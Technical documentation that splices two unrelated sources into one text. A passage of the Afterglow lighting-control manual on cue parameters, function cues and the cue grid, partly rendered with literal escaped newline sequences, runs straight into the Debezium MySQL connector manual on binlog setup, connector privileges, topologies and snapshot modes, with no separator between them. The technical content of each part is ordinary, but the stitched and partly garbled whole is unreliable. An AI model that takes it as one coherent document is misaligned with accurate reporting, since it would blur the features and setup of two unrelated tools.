can offer inspiration for variations\nthat you might want to create yourself.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:short-name`\n|effect name\n\n|Sets the text to be displayed for the cue in the web cue grid, and in\nthe text display of the controller (if it has one) when the cue is\nrunning. 
If you don't supply a short name, the name of the\neffect created by the `effect` function is used, but that may be too\nlong or not informative enough.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:variables`\n|none\n\n|Specifies a sequence of show variable bindings that\ncan be used by the cue's effect. Each variable specification is a map,\nwhose content is described in the following table. These\nspecifications are used to create any necessary new variables, and a\nmap describing any cue-local variables is passed to the `effect`\nfunction when the cue is triggered, so they can be used as needed when\ncreating the cue's effect.\n\n|===\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.[[cue-variables]]Cue variable specification maps\n|===\n|Key\n|Default\n|Purpose\n\n|`:key`\n|_n\/a_\n\n|Identifies the variable that is being bound to the cue. 
This can
 either be a keyword, which refers to an existing show variable (set
 using
 http://deepsymmetry.org/afterglow/doc/afterglow.show.html#var-set-variable.21[afterglow.show/set-variable!]),
 or a string, meaning that a new variable should be introduced for the
 cue. The actual name of this new variable will be assigned when the
 cue is activated. In order for the effect to be able to access the
 correct variable, a map is passed to the `effect` function that
 creates the cue's effect. Within this map, the keys are keywords
 created from the strings passed as `:key` values in the cue's
 variable specification maps, and the corresponding values are the
 keyword of the variable that was created for the cue to go with that
 key. An example of using such cue-local variables can be found in the
 source of the
 http://deepsymmetry.org/afterglow/doc/afterglow.examples.html#var-make-strobe-cue[make-strobe-cue]
 example, for the variable `level`. That cue also makes use of the
 independent show variable `:strobe-lightness`, which is set by a
 separate `adjust-strobe` cue running the effect
 http://deepsymmetry.org/afterglow/doc/afterglow.effects.fun.html#var-adjust-strobe[afterglow.effects.fun/adjust-strobe],
 forming an interesting demonstration of interacting cues.

|`:start`
|`nil`

|Specifies the value to assign when creating the cue-local variable.
 Applies only when the value at `:key` is a string rather than a
 keyword, so a variable is being created just for the cue.

|`:name`
|variable name

|Provides a name to identify the variable in the web interface and in
 the text area of physical controllers which provide a labeled
 interface for adjusting running effects, like the Ableton Push. If no
 name is supplied, the name of the value passed with `:key` is used;
 provide `:name` in cases where that would be insufficiently
 descriptive.

|`:short-name`
|none

|If present, gives a shorter version of `:name` to be used in
 interfaces with limited space.

|`:min`
|`0`

|Specifies the smallest value that the variable can be adjusted to, for
 interfaces which support adjustment of cue variables while the cue is
 running. If not supplied, the minimum value will be zero.

|`:max`
|`100`

|Specifies the largest value that the variable can be adjusted to, for
 interfaces which support adjustment of cue variables while the cue is
 running. If not supplied, the maximum value will be one hundred.

|`:type`
|`:float`

|Provides a hint for how the variable should be formatted in
 adjustment interfaces. Supported values are `:integer` and `:float`.
 Others may be added in the future. If not provided (or an
 unrecognized value is provided), the variable is assumed to hold
 floating-point values.

|`:centered`
|`false`

|Requests that variable adjustment interfaces which draw a graphical
 representation of the current value within its range display this
 variable as a deviation from a central value, rather than something
 growing from the left, if they have such options.

|`:resolution`
|_varies_

|Specifies the smallest amount by which the variable should be
 adjusted when the user is turning a continuous encoder knob.
If not
 specified, the controller implementation gets to decide what to do.
 The recommended default resolution is no larger than 1/256 of the
 range from `:min` to `:max`.

|`:aftertouch`
|`false`

|If present, with a true value, requests that the variable value be
 adjusted by aftertouch pressure while the operator is holding down
 the button or pad which launched the cue, on controllers which have
 pressure sensitivity.

|`:aftertouch-min`
|`:min`

|If present (and `:aftertouch` is active), specifies the smallest
 value the variable should be set to by MIDI aftertouch pressure. If
 not specified, the standard `:min` value is used.

|`:aftertouch-max`
|`:max`

|If present (and `:aftertouch` is active), specifies the largest
 value the variable should be set to by MIDI aftertouch pressure. If
 not specified, the standard `:max` value is used.

|===


[[creating-function-cues]]
Creating Function Cues
~~~~~~~~~~~~~~~~~~~~~~

Often you want a cue to activate a specific feature of a fixture
(often described as a _function_ in the fixture manual, and in the
fixture definition within Afterglow, which can unfortunately get
confusing when we are talking about invoking Clojure functions). To
make it easy to work with such fixture capabilities, the
`afterglow.effects.cues` namespace also offers the
http://deepsymmetry.org/afterglow/doc/afterglow.effects.cues.html#var-function-cue[function-cue]
function. It is quite similar to the `cue` function described
<<cues#creating-cues,above>>, but it takes care of creating the effect
for you, given the function name you want to apply to a fixture or set
of fixtures. You can even apply the function to fixtures from
different manufacturers, regardless of whether they implement it on
different channels and with different value ranges. If it has been
assigned the same function name (such as, for example, `:strobe`),
Afterglow will find it in each fixture definition, and send the right
values to each fixture.

NOTE: Function cues are able to figure out how to do the right thing
for each fixture because they can scan the fixture definitions for
<<fixture_definitions#function-specifications,Function Specifications>>
matching the keyword you gave when creating the cue. When you patch a
fixture into a show, Afterglow indexes its function ranges in order to
make this efficient.

`function-cue` also automatically creates a temporary cue-local
variable for <<mapping_sync#effect-control,adjusting>> the function
level if the function is not fixed over its range. This makes it
essentially a one-liner to create a button in your cue grid which
activates a function and then, if your controller supports it, lets
you tweak that function while it is running.
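Here is a minimal sketch of such a one-liner (the fixture name
`"torrent"` is hypothetical, and it assumes `afterglow.effects.cues`
and `afterglow.show` have been required as `cues` and `show`):

[source,clojure]
----
;; A cue which activates the :focus function of the fixtures named
;; "torrent", starting at half of the focus range. Since :focus is a
;; variable function, a cue-local variable is created automatically
;; so the level can be adjusted while the cue runs.
(cues/function-cue :torrent-focus :focus (show/fixtures-named "torrent")
                   :effect-name "Torrent Focus" :level 50)
----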
Examples include the Torrent\ngobo, focus, and prism cues created by\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues].\n\nMinimally, `function-cue` requires three parameters: `show-key` which\nis the keyword that will be used to add the cue's effect to the show\nwhen the cue is triggered, ending any other effect running under that\nsame keyword, `function`, which is the keyword identifying the\nfixture-specific capability that you want the cue to activate and\ncontrol, as defined in the fixture definition, and `fixtures`, which\nis the list of fixtures or heads that you want the cue to affect.\n(Only fixtures and heads which actually support the specified function\nwill be affected by the cue.)\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created, and are described below. See the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[API\ndocumentation] for more details.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `function-cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:effect-name`\n|function name\n\n|Sets the name to assign the effect created by the cue. If none is\n provided, the name of the `function` keyword is used.\n\n|`:short-name`\n|none\n\n|Can be used to provide a shorter name to be displayed for the cue in\nthe web cue grid, and in the text display of the controller (if it has\none) when the cue is running.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:level`\n|`0`\n\n|If provided, and the function supports a range of values with\n different meanings (such as a focus range, movement speed, or the\n like), sets the initial level to assign the function, and to the\n variable which will be introduced to allow the function value to be\n adjusted while the cue runs. Functions with no variable effect will\n ignore `:level`, and will have no cue-specific variables created for\n them. The level is treated as a percentage, where 0 is mapped to the\n lowest legal DMX value that activates the function, and 100 is mapped\n to the highest.\n\n|`:htp`\n|`false`\n\n|If supplied along with a true value, causes the effect that is\n created for this cue to operate with _highest-takes-precedence_ rules\n with respect to any other effect which has already assigned a value\n for this function. Otherwise, the effect will simply discard any\n previous assignments, replacing them with its own regardless of their\n value.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. 
Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the function value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`0`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the function should be set to by MIDI aftertouch pressure. If\n not specified, `0` is used, which corresponds to the lowest legal\n DMX value the fixture definition identifies for the function.\n\n|`:aftertouch-max`\n|`100`\n\n|If present (and `:aftertouch` is active), specifies the largest value\n the variable should be set to by MIDI aftertouch pressure. If not\n specified, `100` is used, which corresponds to the highest legal DMX\n value the fixture definition identifies for the function.\n\n|===\n\n[[controlling-cues]]\nControlling Cues\n~~~~~~~~~~~~~~~~\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html[afterglow.controllers]\nnamespace defines some helpful functions for working with cues, and\ndefines a\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-IGridController[grid\ncontroller protocol] which rich controller mappings, like the one for\nthe <<mapping_sync#using-ableton-push,Ableton Push>>, use to attach\nthemselves to a running show, and synchronize with the web interface.\n\nIf you are implementing a new grid controller mapping, you will want\nto study that protocol, and will likely find the Ableton Push mapping\na useful example and starting point for your own work. (And please,\nwhen you are done, submit a pull request to add your implementation to\nAfterglow!)\n\nWhen you are setting up the cue grid for your show, you will use\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-set-cue.21[set-cue!]\nto arrange the cues you want it to contain. 
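As a sketch, placing the function cue shown earlier into the grid at
column 6, row 7 might look like this (assuming `afterglow.controllers`
has been required as `ct`, and that the sample show is bound as
`*show*`):

[source,clojure]
----
;; Add a cue to the show's cue grid at x=6, y=7. The grid dimensions
;; grow as needed, and all attached interfaces see the cue right away.
(ct/set-cue! (:cue-grid *show*) 6 7
             (cues/function-cue :torrent-focus :focus
                                (show/fixtures-named "torrent")
                                :effect-name "Torrent Focus"))
----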
The
http://deepsymmetry.org/afterglow/doc/afterglow.examples.html#var-make-cues[make-cues]
function in the examples namespace contains a lot of examples of doing
this. As cues are added to the grid, its dimensions are updated, and
the web interface and any registered grid controllers will
immediately reflect the new cue and dimensions.

You can remove a cue from the grid with
http://deepsymmetry.org/afterglow/doc/afterglow.controllers.html#var-clear-cue.21[clear-cue!].

The rest of the functions in the `afterglow.controllers` namespace are used by
controller implementations and running shows to mediate their
interactions with the cue grid; dig into them if you are writing code
in those spaces.


= Debezium Connector for MySQL
:awestruct-layout: doc
:toc:
:toc-placement: macro
:linkattrs:
:icons: font
:source-highlighter: highlight.js

toc::[]

Debezium's MySQL Connector can monitor and record all of the row-level changes in the databases on a MySQL server or HA MySQL cluster. The first time it connects to a MySQL server/cluster, it reads a consistent snapshot of all of the databases. When that snapshot is complete, the connector continuously reads the changes that were committed to MySQL 5.6 or later and generates corresponding insert, update, and delete events. All of the events for each table are recorded in a separate Kafka topic, where they can be easily consumed by applications and services.

As of Debezium 0.4.0, this connector adds preliminary support for https://aws.amazon.com/rds/mysql/[Amazon RDS] and https://aws.amazon.com/rds/aurora/[Amazon Aurora (MySQL compatibility)]. However, due to limitations of these hosted forms of MySQL, the connector retains table-level locks link:#snapshots-without-global-read-locks[for the duration of an initial consistent snapshot].

[[overview]]
== Overview

MySQL's http://dev.mysql.com/doc/refman/5.7/en/binary-log.html[_binary log_], or _binlog_, records all operations in the same order they are committed by the database, including changes to the schemas of tables or changes to data stored within the tables. MySQL uses its binlog for replication and recovery.

Debezium's MySQL connector reads MySQL's binary log to understand what and in what order data has changed. It then produces a _change event_ for every row-level insert, update, and delete operation in the binlog, recording all the change events for each table in a separate Kafka topic. Your client applications read the Kafka topics that correspond to the database tables they're interested in following, and react to every row-level event they see in those topics.

MySQL is usually set up to purge the binary logs after some period of time. This means that the binary log won't have the complete history of all changes that have been made to the database.
Therefore, when the MySQL connector first connects to a particular MySQL server or cluster, it starts by performing a link:#snapshot[_consistent snapshot_] of each of the databases. When the connector completes the snapshot, it then starts reading the binlog from the exact point at which the snapshot was made. This way, we start with a consistent view of all of the data, yet continue reading without having lost any of the changes made while the snapshot was being made.

The connector is also very tolerant of failures. As the connector reads the binlog and produces events, it records the binlog position with each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart it simply continues reading the binlog where it last left off. This includes snapshots: if the snapshot was not completed when the connector is stopped, upon restart it will begin a new snapshot. We'll talk later about how the connector behaves link:#when-things-go-wrong[when things go wrong].


[[setting-up-mysql]]
== Setting up MySQL

Before the Debezium MySQL connector can be used to monitor the changes committed on a MySQL server, the server must be set up to use _row-level binary logging_ and have a database user with appropriate privileges. If MySQL is configured to use global transaction identifiers (GTIDs), then the Debezium connector can more easily reestablish connection should one of the MySQL servers fail.

The following sections outline in more detail how to set up these features in MySQL.

[[enabling-the-binlog]]
=== Enabling the binlog

The MySQL server must be configured to use a _row-level_ binary log, which is described in more detail in the http://dev.mysql.com/doc/refman/5.7/en/replication-options.html[MySQL documentation]. This is most often done in the MySQL server configuration file, and will look similar to the following fragment:

[source]
----
server-id = 223344
log_bin = mysql-bin
binlog_format = row
binlog_row_image = full
expire_logs_days = 10
----

where:

* the value for http://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_server_id[`server-id`] must be unique for each server and replication client within the MySQL cluster. When we set up the connector, we'll also assign the connector a unique server ID.
* the value for http://dev.mysql.com/doc/refman/5.7/en/replication-options-binary-log.html#sysvar_log_bin[`log_bin`] is the base name for the sequence of binlog files.
* the value for http://dev.mysql.com/doc/refman/5.7/en/replication-options-binary-log.html#sysvar_binlog_format[`binlog_format`] must be set to `row` or `ROW`.
* the value for https://dev.mysql.com/doc/refman/5.7/en/replication-options-binary-log.html#sysvar_binlog_row_image[`binlog_row_image`] must be set to `full` or `FULL`.
* the value for http://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_expire_logs_days[`expire_logs_days`] is the number of days for automatic binary log file removal. The default is 0, which means "no automatic removal," so be sure to set a value that is appropriate for your environment.

[TIP]
====
Running a MySQL server with binary logging enabled does slightly reduce performance of the MySQL server, but the benefits generally outweigh the costs.
Each binlog reader will also place a small load on the server, so using Debezium is a great way to minimize this load while providing the change events to a large variety and number of consumers.
====

[[enabling-gtids]]
[[enabling-gtids-optional]]
=== Enabling GTIDs (optional)

The MySQL server can be configured to use https://dev.mysql.com/doc/refman/5.6/en/replication-gtids.html[GTID-based replication]. Global transaction identifiers, or GTIDs, were introduced in MySQL 5.6.5, and they uniquely identify a transaction that occurred on a particular server within a cluster. Using GTIDs greatly simplifies replication and makes it possible to easily confirm whether masters and slaves are consistent. *Note that if you're using an earlier version of MySQL, you will not be able to enable GTIDs.*

Enabling GTIDs can be done in the MySQL server configuration file, and will look similar to the following fragment:

[source]
----
gtid_mode = on
enforce_gtid_consistency = on
----

where:

* the value for https://dev.mysql.com/doc/refman/5.6/en/replication-options-gtids.html#option_mysqld_gtid-mode[`gtid_mode`] specifies the GTID mode of the MySQL server.
* the value for https://dev.mysql.com/doc/refman/5.6/en/replication-options-gtids.html[`enforce_gtid_consistency`] instructs the server to enforce GTID consistency by allowing execution of only those statements that can be logged in a transactionally safe manner, and is required when using GTIDs.

Consult the https://dev.mysql.com/doc/refman/5.6/en/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for details and specifics about setting up GTIDs.

[TIP]
====
The MySQL connector does not require MySQL to use GTIDs and GTID-based replication. Each time the connector starts up, it will automatically detect whether it is enabled and adjust its behavior accordingly.
====
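A quick way to confirm that the settings from the last two sections took effect is to query the corresponding system variables on the running server, e.g.:

[source,sql]
----
-- Each of these should report the value configured above:
SHOW GLOBAL VARIABLES LIKE 'binlog_format';    -- expect ROW
SHOW GLOBAL VARIABLES LIKE 'binlog_row_image'; -- expect FULL
SHOW GLOBAL VARIABLES LIKE 'gtid_mode';        -- expect ON, if GTIDs are enabled
----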
[[enabling-query-log-events]]
[[enabling-query-log-events-optional]]
=== Enabling Query Log Events (optional)

Starting with MySQL 5.6, row-based replication can be configured to include the original SQL statement with each binlog event. *Note that if you're using an earlier version of MySQL, you will not be able to enable this feature.*

Enabling this option can be done in the MySQL server configuration file, and will look similar to the following fragment:

[source]
----
binlog_rows_query_log_events = on
----

where:

* the value for https://dev.mysql.com/doc/refman/5.7/en/replication-options-binary-log.html#sysvar_binlog_rows_query_log_events[`binlog_rows_query_log_events`] can be set to `on` or `ON` to enable support for including the original SQL statement in the binlog entry.

[[mysql-user]]
[[create-a-mysql-user-for-the-connector]]
=== Create a MySQL user for the connector

A MySQL user must be defined that has all of the following permissions on all of the databases that the connector will monitor:

* http://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_select[`SELECT`] - enables the connector to select rows from tables in databases; used only when performing a snapshot
* http://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_reload[`RELOAD`] - enables the connector's use of the http://dev.mysql.com/doc/refman/5.7/en/flush.html[`FLUSH`] statement to clear or reload various internal caches, flush tables, or acquire locks; used only when performing a snapshot
* http://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_show-databases[`SHOW DATABASES`] - enables the connector to see database names by issuing the `SHOW DATABASES` statement; used only when performing a snapshot
* http://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_replication-slave[`REPLICATION SLAVE`] - enables the connector to connect to and read the binlog of its MySQL server; always required for the connector
* http://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_replication-client[`REPLICATION CLIENT`] - enables the use of `SHOW MASTER STATUS`, `SHOW SLAVE STATUS`, and `SHOW BINARY LOGS`; always required for the connector

For example, the following statement grants these permissions for a user `debezium` that authenticates with the password `dbz`, where the user can be on any machine:

    GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'debezium' IDENTIFIED BY 'dbz';

[WARNING]
====
Choose a good password that is different from what we use above.

Also, the above grant is equivalent to specifying any authenticating client on _any_ hosts, so obviously this is not recommended for production. Instead, in production you would almost certainly limit the replication user to the machine(s) where the MySQL connector is running within a Kafka Connect service, such as `... 'debezium'@'connect.host.acme.com' ...`.
====
[IMPORTANT]
====
When using the MySQL connector with https://aws.amazon.com/rds/mysql/[Amazon RDS], https://aws.amazon.com/rds/aurora/[Amazon Aurora (MySQL compatibility)], or any other server where the connector's database user is unable to obtain a global read lock, the database user must also have the `LOCK TABLES` permission. See the section on link:#snapshots-without-global-read-locks[snapshots without global read locks] and https://issues.jboss.org/projects/DBZ/issues/DBZ-140[DBZ-140] for additional details.
====

[[supported-mysql-topologies]]
== Supported MySQL topologies

The MySQL connector can be used with a variety of MySQL topologies.

[[mysql-standalone]]
=== MySQL standalone

When a single MySQL server is used by itself, that server must have the binlog enabled (and optionally GTIDs enabled) so that the MySQL connector can monitor it. This is often acceptable, since the binary log can also be used as an http://dev.mysql.com/doc/refman/5.7/en/backup-methods.html[incremental backup]. In this case, the MySQL connector will always connect to and follow this standalone MySQL server instance.

[[mysql-master-and-slave]]
=== MySQL master and slave

http://dev.mysql.com/doc/refman/5.7/en/replication-solutions.html[MySQL replication] can be used to set up a cluster of MySQL instances, where one of the MySQL server instances is considered the _master_ and the other(s) a _slave_. Topologies can include single master with single slave, single master with multiple slaves, and multiple masters with multiple slaves. Which you choose will depend on your requirements, your backup and recovery strategy, and how you are scaling MySQL to handle large data volumes and queries.

To use the MySQL connector with one of these topologies, the connector can follow one of the masters or one of the slaves (if that slave has its binlog enabled), but the connector will see only those changes in the cluster that are visible to that server. Generally, this is not a problem except for the multi-master topologies.

The connector records its position in the server's binlog, which is different on each server in the cluster. Therefore, the connector will need to follow just one MySQL server instance. If that server fails, it must be restarted or recovered before the connector can continue.

[[mysql-clusters]]
[[highly-available-mysql-clusters]]
=== Highly Available MySQL clusters

A https://dev.mysql.com/doc/mysql-ha-scalability/en/[variety of high availability solutions] exist for MySQL, and they make it far easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that slaves are able to keep track of all changes on any of the masters.

[[multi-master-mysql]]
=== Multi-Master MySQL

A https://dev.mysql.com/doc/refman/5.7/en/mysql-cluster-replication-multi-master.html[multi-master MySQL] topology uses one or more MySQL slaves that each replicate from _multiple_ masters. This is a powerful way to aggregate the replication of multiple MySQL clusters, and requires using GTIDs.

As of Debezium 0.3.5, the Debezium MySQL connector can use these multi-master MySQL slaves as sources, and can fail over to _different_ multi-master MySQL slaves as long as the new slave is caught up to the old slave (e.g., the new slave has all of the transactions that were last seen on the first slave). This works even if the connector is only using a subset of databases and/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-master MySQL slave and find the correct position in the binlog.
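As a sketch, this GTID source filtering is controlled with the `gtid.source.includes` and `gtid.source.excludes` connector properties (the server UUID below is hypothetical):

[source]
----
# Only use binlog positions from transactions that originated
# on this replication master:
gtid.source.includes=3E11FA47-71CA-11E1-9E33-C80AA9429562
----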
[[hosted-mysql]]
=== Hosted MySQL

As of Debezium 0.4.0, the MySQL connector adds preliminary support for https://aws.amazon.com/rds/mysql/[Amazon RDS] and https://aws.amazon.com/rds/aurora/[Amazon Aurora (MySQL compatibility)]. The connector works as usual when reading the binlog, but in these environments the link:#snapshots-without-global-read-locks[connector does perform snapshots differently]. This is because these hosted forms of MySQL prevent database users from being able to obtain a global read lock, so the only way for the connector to obtain a consistent snapshot is to use table-level locks instead. Unfortunately, table-level locks link:https://dev.mysql.com/doc/refman/5.7/en/lock-tables-and-transactions.html[affect current transactions], and this means that the locks cannot be released until after the connector completes reading all data and commits its transaction.


[[how-it-works]]
[[how-the-mysql-connector-works]]
== How the MySQL connector works

This section goes into detail about how the MySQL connector tracks the structure of the tables, performs snapshots, and transforms binlog events into Debezium change events; where those events are recorded in Kafka; and how the connector behaves when things go wrong.

[[database-schema-history]]
=== Database schema history

When a database client queries a database, it uses the database's current schema. However, the database schema can be changed at any time, which means that the connector must know what the schema looked like at the time each insert, update, or delete operation is _recorded_. It can't just use the current schema, either, since it may be processing events that are relatively old and may have been recorded before the tables' schemas were changed. Luckily, MySQL includes in the binlog the row-level changes to the data _and_ the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table's schema, which is then used to understand the structure of the tables at the time each insert, update, or delete occurs and to produce the appropriate change event. It also records in a separate _database history_ Kafka topic all of the DDL statements along with the position in the binlog where each DDL statement appeared.

When the connector restarts after having crashed or been stopped gracefully, the connector will start reading the binlog from a specific position (i.e., a specific point in time). The connector rebuilds the table structures that existed _at this point in time_ by reading the database history Kafka topic and parsing all DDL statements up until the point in the binlog where the connector is starting.

This database history topic is for connector use only, but the connector can optionally generate _schema change events_ on a different topic that is intended for consumer applications.
We'll cover this in the link:#schema-change-topic[Schema Change Topic] section.

[NOTE]
====
It is vital that there is a global order of the events in the database schema history, therefore the database history topic must not be partitioned.
This means a partition count of 1 must be specified when creating this topic.
When relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.
====

[[snapshots]]
=== Snapshots

When a MySQL connector that is configured to follow a MySQL server instance is first started, it will by default perform an initial _consistent snapshot_ of a database. This is the default mode, since much of the time the MySQL binlogs no longer contain the complete history of the database.

The connector performs the following steps each time it takes a snapshot:

1. Grab a global read lock that blocks writes by other database clients.
2. Start a transaction with https://dev.mysql.com/doc/refman/5.6/en/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.
3. Read the current position of the binlog.
4. Read the schema of the databases and tables allowed by the connector's configuration.
5. Release the global read lock, allowing other DB clients to again write to the database.
6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements.
7. Scan all of the database tables, and generate `CREATE` events for each row on the appropriate table-specific Kafka topics.
8. Commit the transaction.
9. Record in the connector offsets that the connector successfully completed the snapshot.

The transaction started in step 2 does not prevent other clients from making changes to the tables' rows, but will instead provide the connector with a consistent and unchanging view of the data in the tables. However, the transaction does not prevent other clients from applying DDL, which could interfere with the connector's attempt to read the binlog position and the table schemas. So, the connector obtains a global read lock in step 1 to prevent such problems, and it keeps this lock for a very short period of time while it reads the binlog position and table schemas in steps 3 and 4. This global read lock is released in step 5, before the connector performs the bulk of the work of copying the data.

If the connector fails, is rebalanced, or stops before the snapshot is complete, the connector will begin a new snapshot when it is restarted. Once the connector does complete its initial snapshot, the MySQL connector then proceeds to read the binlog from the position read during step 3, ensuring that the connector does not miss any updates. If the connector stops again for any reason, upon restart it will simply continue reading the binlog where it previously left off. However, if the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will fail with an error.

A second snapshot mode allows the connector to perform snapshots _whenever necessary_.
This behavior is similar to the default _initial_ snapshot behavior described above, with one exception: if the connector is restarted _and_ MySQL no longer has its starting point in the binlog, rather than failing the connector will instead perform another snapshot. This mode is perhaps the most automated, but at the risk of performing additional snapshots when things go wrong (generally when the connector is down too long).

The third snapshot mode ensures the connector _never_ performs snapshots. When a new connector is configured this way, it will start reading the binlog from the beginning. This is not the default behavior because starting a new connector in this mode (without a snapshot) requires that the MySQL binlog contain the entire history of all monitored databases, and MySQL instances are rarely configured this way. Specifically, the binlog must contain at least the `CREATE TABLE ...` statement for every monitored table. If this requirement is not satisfied, the connector will not be able to properly interpret the structure of the low-level events in the binlog, and it will simply skip all events for those missing table definitions. (The connector cannot rely upon the current definition of those tables, since the tables may have been altered after the initial events were recorded in the binlog, preventing the connector from properly interpreting the binlog events.)

As of 0.3.4, a fourth snapshot mode allows the connector to start reading the MySQL binlog from its current position when the connector is started. With the `schema_only` mode the connector reads the current binlog position, captures the current table schemas without reading any data, and then proceeds to read the binlog from its current position. This happens very quickly, and the resulting change event streams include only those change events that occurred *after the snapshot started*. This may be useful for consumers that don't need to know the complete state of the database but only need to know the changes that were made since the connector was started.

As of 0.7.2, a fifth snapshot mode `schema_only_recovery` allows an existing connector to recover a corrupted or lost database history topic. It behaves similarly to `schema_only`, in that it captures the current table schemas without reading any data. The differences are:

* It can only be used on an existing connector, as an update to the connector's configuration.
* It begins reading the binlog at the last committed offset for this existing connector, rather than the binlog's current position.

`schema_only_recovery` can also be used to periodically "clean up" a database history topic (which requires infinite retention) that may be growing unexpectedly.
To do this, the database history topic must be manually deleted before updating the connector's snapshot mode to `schema_only_recovery`.
Note that this mode is safe to use *only* if no schema changes have happened after the committed offset.
